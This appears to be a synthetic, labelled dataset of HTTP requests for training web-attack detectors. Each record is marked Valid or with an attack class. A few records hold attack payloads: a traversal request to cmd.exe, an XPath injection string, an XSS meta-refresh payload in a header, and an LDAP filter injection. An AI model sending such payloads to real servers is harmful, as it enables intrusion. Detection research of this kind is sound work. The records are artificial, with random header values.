Transfer-Encoding: identity
Upgrade: xAwDhi/6.3, egwu/9.7
Warning: 242 www.aseaogr.html "nerangaikenWialAe" 
X-Forwarded-For: 221.57.39.147
X-Serial-Number: 7185316182193788
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 13635
Start - Id: 23686
class: Valid
GET /jITchujEn9/efpaw/obDLuB/SA5Iservices/8ojnw/S0tqx2Espd9ro/aEf7nforoef/0PJ_zacceptiQgq/ik/3pOV@2BS99Jwm7/d.e5@/bhcpdbad6aJls51.asmx?nk1nwnetowbgosx=nqc&oAx5aFa=5654221&8htb3=rkfztletrdme&igeroLcH=%28epshsselectzaQl%5CeoWsv&tdonzqo=t9FQqMwwQuTy&NXP-Sw=583980&unTbdadsms=m&cL_7Zgvl7dM=lTT&seninizEner=EoSb&qh2itheheh=3772113&xnscuicgtdc=f_PXQ1oXhLHT&bPP-1PuIQ=sEpi HTTP/1.1
Host: www.talwdlb.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.1
Accept-Language: yi4ed-htmt4sa, oAN-mq;q=0.4, ants-x9o2, npsn-4;q=0.7
Cache-Control: no-transform
Client-ip: 3.52.184.2
Cookie: laauYhratzht=7755
Cookie2: $Version="37"
Date: Tue, 29 Sep 09 11:18:51 GMT
ETag: "ipjhgHBbLfuc67d66"
Expect: itas
From: lanon@fBeece5si.gov
If-Modified-Since: Wed, 22 Jun 05 13:02:23 GMT
If-Unmodified-Since: Wed, 12 May 04 10:56:21 GMT
If-Match: "KtufZn6DnvTv5Yq"
If-None-Match: "FN3WxO6Qrl9v881"
If-Range: *
Max-Forwards: 139
MIME-Version: 4.4
Pragma: nE='eicr'
Proxy-Authorization: eaweh z0t6U6=ndaum
Authorization: Digest nonce
Range: 5716-
Referer: /7ltdk/tea9eote/wersq7s.mdb
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: aAume@ http://www.cgar.com
UA-CPU: MIPS
UA-Disp: 188,809,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 3131x3591
Via: 6.8 123.180.144.134, FTP/1.7 204.72.200.21, 2.5 www.qtwts.jpg
Transfer-Encoding: deflate
Upgrade: 85ipnt/6.3, atout/3.2
Warning: 864 120.66.207.244 "ttya" 
X-Forwarded-For: 11.1.75.209
X-Serial-Number: 13224
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23686
Start - Id: 36603
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 13.149.25.131
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.7, identity;q=0.4, deflate
Accept-Language: 1oigHt-mckptoee;q=0.3, eiQlor-oVb8r
Cache-Control: no-store
Client-ip: 23.156.69.62
Cookie: iaBoetld=g:r/t;senbh=60176188;e2nle=hsde6 ] @n@6h0d?m8l
Cookie2: $Version="9"
Date: Thu, 01 Nov 07 22:12:27 GMT
ETag: W/"pQOXcIItfLgaCXJGA"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Thu, 29 Sep 05 18:53:19 UTC
If-Unmodified-Since: Wed, 05 Aug 09 15:14:53 CET
If-Match: "aaufnW@WpplOgqNdd.Mr"
If-None-Match: "y3-OKVTeDdF14ozbiQ9"
If-Range: Tue, 04 Apr 06 01:21:17 GMT
Max-Forwards: 95
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Basic aG1pbDk4YzptZTNlcA==
Range: 44-016,-83673
Referer: /eonKel9/nnis/ht3o.jsp
TE: gzip
Trailer: Max-Forwards
User-Agent: n9lsinethw (ep78671)
UA-CPU: MIPS
UA-Disp: 1925,168,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: FTP/6.3 72.148.245.251
Transfer-Encoding: compress
Upgrade: uof/2.1, pIto/5.6, Weac/8.2, o0shyf/1.7
Warning: 079 www.hmte9ks.gif "bsnlaehuereei" 
X-Forwarded-For: 2.248.231.30
X-Serial-Number: 0686987
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36603
Start - Id: 7103
class: Valid
PUT /esoitfanhtle.jpg? HTTP/1.1
Content-Length: 192
Content-Language: ifRsls
Content-Encoding: identity
Content-Location: http://ahoonmwt.it/ni7s3la.asmx
Content-MD5: aGVuc3RvbmFmcnM0aDVyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Aug 09 18:43:01 GMT
Last-Modified: Sat, 20 Aug 05 10:48:34 GMT
Host: www.sbmShn2o.it
Connection: keep-alive
Accept: application/postscript, text/plain;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 103.215.132.134
Cookie: kdpy=socsot;nnepebtKm4ol=esZwjSRRo;ruc=ar;Q4UIgh@NIZU=osjfucC_Po8;dwb6thFtoiafa=eaeeyrmntihawsYnj
Cookie2: $Version="9"
Date: Mon, 22 May 06 11:44:20 UTC
ETag: W/"S5-7GinuP7n6CWZ"
Expect: 100-continue
From: seo2cK@ohex.be
If-Modified-Since: Sun, 03 Aug 08 20:16:13 CET
If-Unmodified-Since: Thu, 13 Apr 06 13:41:00 GMT
If-Match: *
If-None-Match: *
If-Range: "NOsJtbM.lIMY0qa"
Max-Forwards: 85
MIME-Version: 6.3
Pragma: lh='ccf'
Proxy-Authorization: Digest nonce
Authorization: Basic dGp4cnQ6U2VvaHdsbmE=
Range: -1123,49-40,9-39799
Referer: /edoWjrro/sm08r/y89sfHt/hh0a.swf
TE: trailers
Trailer: Accept-Language
User-Agent: 8oME3elC/6.2
UA-CPU: x86
UA-Disp: 9784,4196,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1536x3422
Via: FTP/0.7 24.39.188.138, FTP/6.4 www.htaNsoo.shtml, 1.3 www.yftjexw.gif
Transfer-Encoding: gzip
Upgrade: nb9/4.8, ennjo/7.4
Warning: 264 161.79.112.25 "enoe2jwr1nEia" "Thu, 27 Mar 08 17:30:38 CET"
X-Forwarded-For: 60.44.207.26
X-Serial-Number: 317162195276859
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vnetpfheoaeooi4=865624&tcuai1snIlihdw=05147&teceemahcoe1kr=5581183&ceasidk6oqhb0s=ty&xh=hlg4hnjto8n&1hejlxgRgzNi=acceptrd&ii6vMdoogbsd8ci=070&AsE86_1home_=sapaisEhe&anhsaTY=dhd7aeKidlevalcyema

End - Id: 7103
Start - Id: 11017
class: Valid
GET /0nqarrEneecout/iannfete/j1Ust_MHv/P0dnstdin/Tmo3aeawowctoat/ytpu.ogUz.png? HTTP/1.0
Host: 208.138.178.94
Connection: close
Accept: */*
Accept-Charset: utf-7;q=0.8
Accept-Encoding: identity, gzip, compress, compress;q=0.5
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 102.97.73.215
Cookie: 6tdeiR8leFspae=eteitoan0lno
Cookie2: $Version="752"
Date: Tue, 20 Mar 07 19:22:41 CET
ETag: "9zaHIlbRk0sS1PMR"
Expect: 100-continue
From: vhehmsi@me0S.gov
If-Modified-Since: Sun, 24 Jan 10 23:04:16 GMT
If-Unmodified-Since: Wed, 18 Mar 09 02:38:16 GMT
If-Match: "z.iEbjSN8Xu9x-CtHo4Q"
If-None-Match: "HBmPUA9Kpt7RyEiOGfE"
If-Range: "l-S6yqdjrR@5prS8"
Max-Forwards: 9136
MIME-Version: 8.9
Pragma: e=uad
Proxy-Authorization: Digest nc=bdfa3079
Authorization: frlo aanmyNd=hr5h
Range: 088577-,4710-50
Referer: /hslQ/ztvnpia.jsp
TE: gzip,trailers,gzip
Trailer: Date
User-Agent: Mozilla/9.6 (compatible; MSIE 9.8; WinNT; Yfosim; lCireSos; sadsegoeri)
UA-CPU: x86
UA-Disp: 618,722,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 956x6194
Via: HTTP/6.5 www.escO.jpg
Transfer-Encoding: deflate
Upgrade: fbea/3.4, dod1i/0.7
Warning: 404 55.233.111.251 "hwzpimntn" 
X-Forwarded-For: 187.124.141.113
X-Serial-Number: 109708230731
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11017
Start - Id: 13451
class: Valid
GET /avxTkaq/and5vB9.f0GJvstdinwnode/xUg/a7acoe/cw.GbUO/drlrRASe/zIv/e0WA/between3/yatgakoatetnd.php?OpeeporTungosnO=ijMLZzr&QZqa@=idl6&Xqwstylerq6=9832&cozaenwhuuLen=d4athnr5beeEhee&oHeliodl=056579&bmailFAnQ_insert=ag2mhDtE3n5&xS@N1jSD4Ld=3401524&yRpeoF=s0-%40vc_y%40&aart=ys%3Dbgaonnei%28Xreplaceep%27&sdmns9hoatxUne=rrieer2seods HTTP/1.1
Host: www.breancgiw.biz
Connection: tpsr
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: eY-r;q=0.6, ie4os-agmL;q=0.3
Cache-Control: max-stale
Client-ip: 61.236.0.64
Cookie: iRtorwhiuaog=Eea;oTegihn=e5coans4E7hdssa;Oir97epelcyut=cF6@
Cookie2: $Version="193"
Date: Fri, 01 Jun 07 13:20:56 GMT
ETag: W/"xnaDYbZ8R0GKRm.lcO2"
Expect: 100-continue
From: onWi@fbwst.st
If-Modified-Since: Mon, 13 Jul 09 05:18:55 CET
If-Unmodified-Since: Thu, 02 Dec 04 10:48:07 CET
If-Match: "WYjxVPNDgmazS2_"
If-None-Match: "DjRGbv6EWuQj0cny"
If-Range: Fri, 08 May 09 20:33:58 GMT
Max-Forwards: 189
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM c29lb25mYXNyc25sc29uZUJkb2F4b2FlczBqRWxOck50cHJsaQ==
Authorization: dshsfr ockh=4too
Range: -20257
Referer: /eohreei/T1atn6e/8tneod/etlhe.tar
TE: trailers,trailers
Trailer: Authorization
User-Agent: zYobu9IAi/5.1.6.6.0
UA-CPU: PowerPC
UA-Disp: 710,2643,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 9732x9138
Via: 6.6 www.qsSlnpe.html:9
Transfer-Encoding: deflate
Upgrade: gau/6.0
Warning: 231 www.rsit.htm "dIbgtoshqoaaxhmt" "Sun, 20 Jun 04 15:44:58 CET"
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 564796261351412431
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13451
Start - Id: 49872
class: XPathInjection
GET /7ntxz-YXopvmqV/RYQ/oATnxTF/iTZjxY/esam5keeolo0doT/laihqtrtl/lib.htm?egvdnsstEuor=72431&4PDbqU=2&f0Jetezu=ceeoso+&nlueoscxvNate=lmD&yebaxm7h=-&mj5cPeL=6903&nixbgetoeh5eab=oRB82m&HYYHQm4E=lh%3A+PoFdbes+htHinl%3C&oFLcPepry=9n&c7.-1B@5M=etheu1&udeRerrIi7d=aroSeg%27++++or+++++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i++%2B++++j++++%2B++k+++%2Bl++%2B+++1%29%5D+%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+%277ne%27+++%3D++%27+GaSs%27++or&he=3795 HTTP/1.1
Host: 49.116.106.32:80
Connection: close
Accept: image/*, application/*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: jooi-pt, sttrioe-zr
Cache-Control: max-age=38
Client-ip: 119.142.72.137
Cookie: e2s5oail=7;tdisi=725768;ncIgQm=qt7kc5eteeeerEB8ei
Cookie2: $Version="5"
Date: Thu, 21 Feb 08 14:38:53 GMT
ETag: "xcInQ_66Zglzx9B"
Expect: 100-continue
From: s8can@mqtlr.fr
If-Modified-Since: Sat, 14 Jul 07 07:52:09 UTC
If-Unmodified-Since: Thu, 30 Jul 09 11:24:27 UTC
If-Match: "AsjT_0j5Hb4Qf.Xq.Z"
If-None-Match: "kjPd5foA5vT_XVe7DJN"
If-Range: Fri, 20 Feb 09 14:42:52 CET
Max-Forwards: 0915
MIME-Version: 4.8
Pragma: ondlRepc=isva
Proxy-Authorization: Basic ZWVic2FsVDp0c2VyZQ==
Authorization: Digest nonce
Range: -307462,64-76604
Referer: http://www.Tshtxtn.org/ense/ibm6t0n/drdtt.gz
TE: deflate;q=0.1,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.5 (X11; U; Linux i586 5.2; rs-un; rv:6.9.0) Gecko/92417409
UA-CPU: x86
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8115x7637
Via: 2.2 www.cy5ouye.htm, 9.2 www.einiz0.shtml, FTP/8.7 43.45.229.39
Transfer-Encoding: identity
Upgrade: hiv/6.0, 8geb/7.6, ssu82v/5.0
Warning: 805 www.rthT.jpeg "seTho" "Sat, 29 Apr 06 13:15:49 GMT"
X-Forwarded-For: 24.251.121.187
X-Serial-Number: 5095784293385
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49872
Start - Id: 12808
class: Valid
GET /bgsderena4ynwa0e/8Zjr/3tL/e7Ll41MbQC9nCt/ohtily0tfL/eEpulqnxnm3/zN0x.TQHxt-.htm?WxHreplacediv=rYPBHpoW&eBshutdownfX-sB=sem6qVjByH&entl83=oO7yZ&1t5urekeEthae=beZe+&iismkxnr=gneoxtoar%28s%3D&ail1nolansws=gq9aoanowxi&enhOwuh=oa%3FrmSe&lEe8o6si=koatNrana1q5&a77EseasCd8iz=mn6no86ntIiw&3McAeru=aIX6icFHdk&eturiu=m5t8cZzibH&ne72w=db0W3uOu5DAA&EeoeeuqlawK=635295&aigadonbwt0iio3=6451&Sth=817219549 HTTP/1.1
Host: www.sattnaS.uk:80
Connection: keep-alive
Accept: audio/x-wav;q=0.2, video/mpeg, image/*;q=0.4
Accept-Charset: x-mac-hebrew, euc-tw;q=0.8, x-mac-arabic, windows-1252;q=0.3, iso-8859-15
Accept-Encoding: deflate, deflate;q=0.2
Accept-Language: driees-9
Cache-Control: no-store
Client-ip: 186.162.244.242
Cookie: 7etesm=terIre
Cookie2: $Version="21"
Date: Wed, 27 Dec 06 13:25:21 UTC
ETag: "QzPcqpZi2O_q9GB@WG"
Expect: 100-continue
From: tibfhrt@6ra7.com
If-Modified-Since: Sun, 10 Dec 06 10:02:51 CET
If-Unmodified-Since: Wed, 02 Dec 09 13:11:55 CET
If-Match: *
If-None-Match: "s5tv1RfNo3sfcMr2L"
If-Range: Sat, 19 Jan 08 19:23:51 UTC
Max-Forwards: 54
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Dd9wtz rtdAWeey=ue7dsn
Range: 880687-,10-
Referer: http://www.Ntndslht.com/andaU/is9rl/lnOitb2.mpg
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: gtyoor
UA-CPU: x86
UA-Disp: 3127,7217,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8634x945
Via: 6.2 www.eDrp.gif:9, FTP/8.8 www.isQhk6s.css
Transfer-Encoding: compress
Upgrade: DoR/2.1, rahogo/2.6
Warning: 373 www.deTeaer.tiff "twuOe" "Tue, 12 Feb 08 01:30:15 GMT"
X-Forwarded-For: 129.36.3.102
X-Serial-Number: 392683968
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12808
Start - Id: 46652
class: XSS
GET /si/ua1.uISicn4l/6XNc6@o/ePoEyWxq3wOaIMJD6eL/oGvaN2gtllFsVwyO7A/daoA/mEL6L.jpeg?O6M-TZ=%28cataelkdh7l&nI8eaie2mdnneyw=ety&wEt=2&kmaFD=pn198erdneB&hssxrHYohe=%3B%26pgReu%5Case9l&ehnd6ldihgxs=4668367&mwpinackwymhnvg=nsttcqtf8x&LcetolaRekepoc=exwA&iDyitmmbqor=eosts+&7OhuCt=Jewget%3Ac+nSsre7+&4cift9dCa=gLtwp-+&sHjusrsysteme=yd025C8_&iLreT=woe&onwdieUoeat=8900 HTTP/1.1
Host: www.bc1n.st:4
Connection: close
Accept: image/gif, audio/basic;q=0.3
Accept-Charset: windows-1251;q=0.1, windows-1251, utf-7, macintosh, x-mac-chinesetrad
Accept-Encoding: <meta     http-equiv  =    "   refresh"    content = "    0;url=javascript:   [alert ('xddies');]  "   >
Accept-Language: *
Cache-Control: no-store
Client-ip: 222.189.28.231
Cookie2: $Version="067"
Date: Mon, 01 Nov 04 13:59:27 GMT
Expect: m1bhdo
From: mlCcpn@issz.fr
If-Modified-Since: Fri, 25 Jul 08 16:46:36 GMT
If-Match: "8El9sfmoTk34xfA"
If-Range: "Zl8VlOrGF@GqyLvP"
Max-Forwards: 88
Pragma: e5r=aoAZdl
Range: 1-74039,27-02
Referer: http://www.liahoaA.biz/aeSrhoy/7ccrib/daneg/hpre/d3ewaa.php4
User-Agent: Mozilla/7.9 (X11; U; Unix 2.8; lc-ir; rv:8.4.1) Gecko/84807866
UA-OS: Mac OS X
Transfer-Encoding: tnso

null

End - Id: 46652
Start - Id: 6920
class: Valid
POST /oYpb.Bjqh/zoOteno5aLntuh/xa1lnrecewfS8io/Wimjten4ei42ahrh/mpj3.htm? HTTP/1.1
Content-Length: 178
Content-Language: omqxtxk,mstnS
Content-Encoding: deflate
Content-Location: /reng/cobhr.css
Content-MD5: b2hzbGxiaXdubWRjd3R1eA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 Jul 06 09:28:45 UTC
Last-Modified: Wed, 15 Nov 06 03:38:48 GMT
Host: 11.81.0.238
Connection: keep-alive
Accept: image/jpeg;q=0.7
Accept-Charset: windows-874;q=0.7, x-mac-chinesetrad, windows-874, windows-874;q=0.3, koi8
Accept-Encoding: 
Accept-Language: dlaOtid-ae, d-hkda3uri, u-aefdMR;q=0.2, 0EeI0m-l;q=0.2
Cache-Control: min-fresh=6
Client-ip: 56.82.90.140
Cookie: 9nlznvpoar=202
Cookie2: $Version="95"
Date: Sun, 07 Nov 04 21:11:46 CET
ETag: W/"Cg@8hVnyqEe-eWymWW"
Expect: hIio
From: yo9el@iae0gwfot.st
If-Modified-Since: Tue, 21 Sep 04 03:57:53 GMT
If-Unmodified-Since: Fri, 17 Jun 05 22:10:24 CET
If-Match: "LJeCuMqsrYImMZmVUrxd"
If-None-Match: *
If-Range: Mon, 06 Dec 04 08:42:46 GMT
Max-Forwards: 09
MIME-Version: 1.0
Pragma: ihc6rrFe='eawgars'
Proxy-Authorization: Digest opaque="4mhrdtn"
Authorization: Digest qop=auth
Range: 50-,2-,-36866
Referer: /usieebt/lbd0EaoH/ecam7bhs/reBeoat.jpeg
TE: chunked;q=0.7,deflate;q=0.0,chunked;q=0.5
Trailer: Accept
User-Agent: Mozilla/7.1 (X11; U; Linux i586 1.3; ur-sS; rv:9.4.4) Gecko/20927414
UA-CPU: PowerPC
UA-Disp: 7932,0076,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 710x6722
Via: 1.6 121.68.26.199
Transfer-Encoding: deflate
Upgrade: jnn/5.4, CEsiph/9.7, EROmc/3.9, uh1a/1.7, arg/1.8
Warning: 638 www.shTkt.js "btitcWe0Sneyss7waf" "Sat, 20 Jan 07 15:52:13 UTC"
X-Forwarded-For: 51.157.61.248
X-Serial-Number: 78875126
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

9a0C10d=76165&enteauwNO=llrsamDsho&Apxe=so/rootua5&ve=83958975&ilrtinrrpe=0&ien=ihh5bhojh1cs&w0o=ySertSa5t&ua=3etciy93u1jdi@gRn&l5tveo2ysz=ovsvs=obtreu&50tORgpA8c=952235115

End - Id: 6920
Start - Id: 2973
class: Valid
GET /natioemcqpoE7tner58e/faooaDhrle/nhVArL/uKbHFthQ.N/b.-P-MKG.x/RIaNmdogpGgscriptFJ/n_GPJwRbIQCZXUg-O/tuBv83/d9fiqGDDIo/eRcsUtMsTXJYrcFTkG..mspx?lv0sniegXTsye=745&ogd=79254&egcr0yfI=robodyLoattenno&leCsfqai=E9sio&uei=3atdioa0nyante&libZT1passwd_gze=hpetnlyatEbAsssh&eirOeatwedrtLo9=oqsrc4ayr&5uh5=eavhletpikr09m&tgimsisa=+-ert7t2me&7sbrtnateh=system9logf+%3Asndlinkoodc&fOntlArtrTt=ga HTTP/1.0
Host: www.smiawtto.gov:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: aetd-lchrn;q=0.4, fzedte-mI, siercwt3-stthy;q=0.9, 2irtw-oi
Cache-Control: no-store
Client-ip: 36.249.242.235
Cookie: ebndaeetnae=nitaargcdl;_Dx3=i@IcQGjC;ef@mocha3ikLV=yla?cktonm54dem;VpTagt=cetrykttibrtp7h;guo9habndslhog=ryrrleheyH
Cookie2: $Version="1"
Date: Wed, 18 Oct 06 08:44:28 UTC
ETag: W/"gkaRWdgtR1N8TwMOaI@"
Expect: 100-continue
From: Eth9@iyo0iiiw3a.it
If-Modified-Since: Fri, 07 Aug 09 18:08:10 UTC
If-Unmodified-Since: Mon, 22 Jan 07 20:35:13 UTC
If-Match: "A_DWtfWsW9fD7TZcM"
If-None-Match: *
If-Range: *
Max-Forwards: 08
MIME-Version: 1.3
Pragma: eo='K'
Proxy-Authorization: Basic bGUxcjpiQTlh
Authorization: ofkgf tomeysc=hInauc2
Range: 941701-436,57-,44-
Referer: http://www.hEontA.fr/koEnnSc/ewca8d/eceMir/nlqdhc.tar.gz
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.4 (compatible; MSIE 7.6; Unix; Rsswxorhc; tTiatede)
UA-CPU: StrongARM
UA-Disp: 5870,274,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8247x2505
Via: 5.1 95.164.57.35, HTTP/2.9 35.181.208.175:82
Transfer-Encoding: dtfe
Upgrade: er1/3.7, ohbtar/9.6, igrns/9.6, QebnrE/9.1, rWoN/5.7
Warning: 133 129.24.35.131 "eutrftdlptmud" 
X-Forwarded-For: 200.70.38.178
X-Serial-Number: 39984855
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2973
Start - Id: 2201
class: Valid
GET /eans/bgieth1nern/LY9tunao8Sm/asutgeo/oAlamEi5oo/sei/ltnl0daaeov/7WXDOh3ZK/hc4-Iz8TQ64_1e.html? HTTP/1.1
Host: www.InfLnplt.de:80
Connection: wmieYia
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 26.112.134.215
Cookie: fNrIratse5t=)7;rAdyanewirpci8l=nea9https;telt=83616
Cookie2: $Version="0"
Date: Wed, 04 Mar 09 21:24:08 UTC
ETag: W/"-gF4ozzO_SijG@DlZua"
Expect: hnss
From: mennl@hhaoaw.st
If-Modified-Since: Mon, 07 Aug 06 21:54:27 UTC
If-Unmodified-Since: Fri, 23 Mar 07 19:30:50 UTC
If-Match: "cw6VJ04.IkHbhiyqaSI@"
If-None-Match: "pCtlFM0X4F0Tpf@HQV8@"
If-Range: Tue, 09 Sep 08 22:57:16 GMT
Max-Forwards: 24
MIME-Version: 3.0
Pragma: lidIeast=h3w
Proxy-Authorization: Basic bmVGeGU6aThsZGc=
Authorization: Basic dHNtY286YnBvN3RlYQ==
Range: 646-76073,721917-1
Referer: http://arnopl.gov/nqdt/ixeh/eebne/yrtes0/r9ica.txt
TE: gzip;q=0.2,chunked;q=0.1
Trailer: If-None-Match
User-Agent: 02NiI6 http://www.dtrihe.st
UA-CPU: Sparc
UA-Disp: 8951,7788,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 318x353
Via: FTP/4.5 247.12.255.51, HTTP/2.3 80.139.78.107, 4.4 211.123.188.161
Transfer-Encoding: mecpp
Upgrade: ql7Ei/0.0
Warning: 143 21.200.146.83 "81ors1eyRh" 
X-Forwarded-For: 2.94.110.211
X-Serial-Number: 26606464842114964
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2201
Start - Id: 34240
class: Valid
PUT /iL3HV0c@I1F1SLKS/eheboolroimTynnsFt/hcnTJPh-WxXmc/esp9su9Acaistgpp/anzm4eskRm/e5loednsh5n/e3sctyin9otlp/oWHI99F/a3s62ZYGmvm7_kdd/hcP.WYFV_2eoh.js? HTTP/1.1
Content-Length: 84
Content-Language: TB
Content-Encoding: compress
Content-Location: /errtal/6eips/hoonoyh.swf
Content-MD5: eXJkaVlzYzhvUms0ZW1leA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Jul 05 11:20:05 CET
Last-Modified: Fri, 28 Oct 05 12:07:42 UTC
Host: 6.104.173.191:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: 1zqA-e, nw6tin-ysh, r-oEo, Aoutdd-Nrhe
Cache-Control: max-age=61741
Client-ip: 151.142.134.2
Cookie: tormfiU=L6eah;ddsu=scAchfocnixajat;te=ledtrbf~vh=q;gid3aftd=etsEtihsheitaodVgr
Cookie2: $Version="53"
Date: Fri, 10 Mar 06 13:53:10 UTC
ETag: W/"sLpsv5OJiPnFYrInalD"
Expect: 100-continue
From: e4eeec@tlsenuWe.de
If-Modified-Since: Wed, 30 Mar 05 01:54:21 GMT
If-Unmodified-Since: Thu, 14 Aug 08 10:47:37 CET
If-Match: *
If-None-Match: "uKsX-IMHeY8G01dIz1"
If-Range: "SZULU__HOhnGOLK"
Max-Forwards: 2
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM bTJyYmw1ZGJudG90OWVydDR3aUEwdUgzZWFoYW1zYmUxZGV0ZW1oa2g=
Authorization: NTLM MjNwZGVSaHYxaWJvc1c2UjJyaXR1bnRlb29hNDFmZWhhYXRvdXpu
Range: -4,1101-830
Referer: /oMg3t/hsoete8d.sh
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/5.0 (compatible; MSIE 1.6; SunOS sun4u; emesCdu; ehawLdx; wbectb7tew)
UA-CPU: 68000
UA-Disp: 6221,5236,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5781x4344
Via: FTP/8.6 www.txnhImy.html
Transfer-Encoding: gzip
Upgrade: ezhTe/9.1, i0t/1.3, huh/6.9, rDvATi/7.5
Warning: 407 www.oa9bah.css "UfvriEEf" "Thu, 30 Apr 09 22:42:10 GMT"
X-Forwarded-For: 43.8.248.224
X-Serial-Number: 66994
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rs5@-9rN5=425008573&aAchoilRe=e1v4FW&fpvhferya8ftle=& k8&ag6rnmo=arxpcaoadttn like

End - Id: 34240
Start - Id: 36987
class: LdapInjection
GET /nv5jZjVk/Dlib/abctiLobTuWl/oEpXp_cdw2-_HFsa.png?cIIs=tswhere%3Ddoa&hiSetnr=9dnimnsvzt+xp_+hlike&.mUC=enEmghnssAwhr&1Gr0iqpaBhhrtm=s%3Etexe%3Aidre&meihsyoiFS=a605Nc0oM5i&7Ste4he=mShes%29%28%26%28objectClass%3D++++ne*%29 HTTP/1.1
Host: 108.188.185.75:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=6557
Client-ip: 141.105.14.226
Cookie: imscriptO21YtCH-=g
Cookie2: $Version="55"
Date: Mon, 09 Mar 09 09:19:29 CET
ETag: "A.6ouufog0okTJg"
Expect: 100-continue
From: 4t9lsozn@n1ns8ofqic.ch
If-Modified-Since: Tue, 05 Apr 05 12:42:11 GMT
If-Unmodified-Since: Mon, 08 Jan 07 01:33:24 GMT
If-Match: *
If-None-Match: "OrvU@KtcfM8_Ap4G"
If-Range: Sun, 29 Jan 06 11:54:07 UTC
Max-Forwards: 6
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic Z2ROZGI6ZGdpaQ==
Authorization: Digest nonce
Range: 84-,-422477,1197-5319
Referer: /shsez/i7sn/eesdor/ibtf2.doc
TE: chunked
Trailer: Via
User-Agent: Mozilla/9.9 (Machintosh; U; PPC 4.8; bd-NN; rv:1.2.8) Gecko/53847976
UA-CPU: MIPS
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 391x727
Via: 3.2 www.onermn1l.png:2294
Transfer-Encoding: compress
Upgrade: m2cnia/0.2, h1ebb/7.9
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 0781389574649
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36987
Start - Id: 34066
class: Valid
PUT /atyeUV/o2dtIf.bin? HTTP/1.1
Content-Length: 121
Content-Language: ch2,iesekn
Content-Encoding: identity
Content-Location: /inwaert5/dicaulIp.mpeg
Content-MD5: SGlFbGVvZ3NhcmhPbWRzdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 23 Jul 06 06:51:16 UTC
Last-Modified: Mon, 01 Nov 04 10:34:17 UTC
Host: www.lHjatdis.org
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: asse8l='atah'
Client-ip: 239.85.198.102
